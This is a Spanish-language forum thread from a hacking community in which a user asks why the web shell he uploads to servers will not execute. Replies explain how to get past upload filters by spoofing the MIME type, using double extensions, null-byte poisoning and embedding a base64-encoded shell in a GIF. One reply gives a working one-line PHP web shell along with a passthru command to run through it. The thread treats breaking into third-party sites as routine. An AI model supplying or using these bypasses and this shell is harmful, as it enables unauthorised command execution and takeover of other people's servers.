Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: ricky19_77 en Mayo 16, 2015, 01:09:20 AM

Título: Problema para subir shell
Publicado por: ricky19_77 en Mayo 16, 2015, 01:09:20 AM
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo
Título: Re:problema para subir shell
Publicado por: S t Ø r M d ∆ r k en Mayo 16, 2015, 02:00:58 AM
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg. Si no se puede intenta bypassear el uploader de otra manera, juega con las extensiones asi file.jpeg.php o file.php.jpeg para q veas como funciona el uploader, puedes intentar tambien un null byte poissoning..

saludos.
Título: Re:problema para subir shell
Publicado por: blackdrake en Mayo 16, 2015, 08:55:54 AM
Haz como dijo storm, si no, recuerda que no todos los uploaders se pueden bypassear.

Saludos.
Título: Re:Problema para subir shell
Publicado por: ricky19_77 en Mayo 16, 2015, 03:16:59 PM
en realidad no lo probe en un solo uploader por eso decia si estoy haciendo algo mal tambien meti la shell dentro del codigo fuente de un gif y tampoco me dejo es que veo muchos tutoriales y lo unico que hacen es subir la shell y despues le cambian la extension y listo se ejecuta
Título: Re:Problema para subir shell
Publicado por: EPSILON en Mayo 16, 2015, 06:02:34 PM
Proba con un gif que no pese mucho, ami me paso de no poder subir por la imagen y cuando la cambie me dejo, agregale el ; al final y metele la shell en base64 con el
Código (php) [Seleccionar]
<? base64_decode(); ?> obvio , y cuando lo subas editale la cabecera y donde dice Content-Type: le pones image/gif (Recuerda que no todos los uploads son vulnerables!)). Saludos!
Título: Re:problema para subir shell
Publicado por: seth en Mayo 17, 2015, 09:43:14 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg.
es lo mismo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo

no todos los uploaders te dejan subir shell
proba con uno que sepas que es vulnerable, lo mas facil es hacerlo en localhost. podes usar este http://n3t-datagrams.net/docs/?/=15
no se que shell estas usando pero capaz no pasa porque es muy pesada. podes usar <?PHP $_GET['a']($_GET['b']);?> y para ejecutar comandos haces ?a=passthru&b=ls
que error te da?
Sólo texto | Texto con Imágenes